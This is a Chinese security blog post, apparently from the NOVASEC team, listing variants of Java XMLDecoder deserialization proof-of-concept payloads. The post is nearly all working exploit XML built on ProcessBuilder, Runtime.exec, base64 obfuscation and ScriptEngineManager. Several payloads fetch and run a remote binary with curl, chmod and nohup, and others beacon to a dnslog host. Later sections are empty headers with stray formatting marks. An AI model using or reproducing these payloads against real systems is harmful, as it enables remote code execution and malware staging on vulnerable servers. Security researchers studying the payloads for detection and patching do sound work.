Java XMLDecode反序列化POC变形
Java XMLDecode反序列化POC变形
原创 酒零 NOVASEC 2025-04-09 22:01
△△△点击上方“蓝字”关注我们了解更多精彩
0x00 前言
免责声明:继续阅读文章视为您已同意[NOVASEC免责声明].
记录一些
简单的
Java XMLDecode反序列化POC变形
1
0x01 ProcessBuilder执行
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0"><string>calc</string></void>
</array>
<void method="start"></void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0"><string>curl http://www.dddd.com:7777/as -O && chmod +x as && nohup ./as &</string></void>
</array>
<void method="start"></void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0"><string>ping -c 1 -n 1 xxxxx.dnslog.cn</string></void>
</array>
<void method="start"></void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>powershell</string></void>
<void index="1"><string>-Command</string></void>
<void index="2"><string>calc</string></void>
</array>
<void method="start"></void>
</object>
</java>
1
0x02 Runtime执行
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="3">
<void index="0">
<string>powershell</string>
</void>
<void index="1">
<string>-Command</string>
</void>
<void index="2">
<string>Start-Process calc.exe</string>
</void>
</array>
</void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_202" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="1">
<void index="0">
<string>calc</string>
</void>
</array>
</void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_202" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="1">
<void index="0">
<string>curl http://www.dddd.com:7777/as -O && chmod +x as && nohup ./as &</string>
</void>
</array>
</void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_202" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="1">
<void index="0">
<string>wget http://xxxxx.dnslog.cn</string>
</void>
</array>
</void>
</object>
</java>
1
0x03 Base64编码
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<!-- 调用 base64 解码命令 -->
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>echo Y2FsYwo= | base64 -d | cmd</string></void>
</array>
<void method="start"></void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>powershell</string></void>
<void index="1"><string>-Command</string></void>
<void index="2"><string>"Start-Process [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Y2FsYwo='))"</string></void>
</array>
<void method="start"></void>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<!-- 调用 PowerShell -->
<void index="0">
<string>powershell</string>
</void>
<!-- 使用 -Command 参数执行命令 -->
<void index="1">
<string>-Command</string>
</void>
<!-- 解码 Base64 并启动 calc -->
<void index="2">
<string>Start-Process -FilePath ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QzpcV2luZG93c1xTeXN0ZW0zMlxjYWxjLmV4ZQ==')))</string>
</void>
</array>
<!-- 启动进程 -->
<void method="start"/>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<!-- 调用 PowerShell -->
<void index="0">
<string>powershell</string>
</void>
<!-- 使用 -Command 参数执行命令 -->
<void index="1">
<string>-Command</string>
</void>
<!-- 解码 Base64 并启动 calc -->
<void index="2">
<string>Start-Process -FilePath ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QzpcV2luZG93c1xTeXN0ZW0zMlxjYWxjLmV4ZQ==')))</string>
</void>
</array>
<!-- 启动进程 -->
<void method="start"/>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo Y2FsYwo= | base64 -d | bash</string>
</void>
</array>
<void method="start"/>
</object>
</java>
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_202" class="java.beans.XMLDecoder">
<!-- 创建一个 ProcessBuilder 对象 -->
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="1">
<void index="0">
<!-- 将 Base64 字符串解码为字节数组,并转换为字符串 -->
<object class="java.lang.String">
<array class="byte">
<!-- 调用 Base64 解码器 -->
<void method="decode">
<object class="java.util.Base64" method="getDecoder"/>
<string>Y2FsYw==</string> <!-- Base64 编码的 "calc" -->
</void>
</array>
</object>
</void>
</array>
<!-- 启动进程 -->
<void method="start"/>
</object>
</java>
1
0x04 Byte编码
****“`
1
**0x05 ScriptEngineManager**
****```
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_202" class="java.beans.XMLDecoder">
<object class="javax.script.ScriptEngineManager" method="newInstance">
<void method="getEngineByName">
<string>JavaScript</string>
<void method="eval">
<string>java.lang.Runtime.getRuntime().exec("calc")</string>
</void>
</void>
</object>
</java>
1
0x06 GroovyShell“`
1
**0x07 Thread执行**
1
**0x08 URLClassLoader**
1
**0x09 反射执行**
“`
END
如您有任何
投稿、
问题
、需求、建议
请
NOVASEC
公众号
后台
留言
!
或添
加 NOVASEC
联系人
感谢您对我们的支持、点赞和关注
加入我们与萌新一起成长吧!
本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!!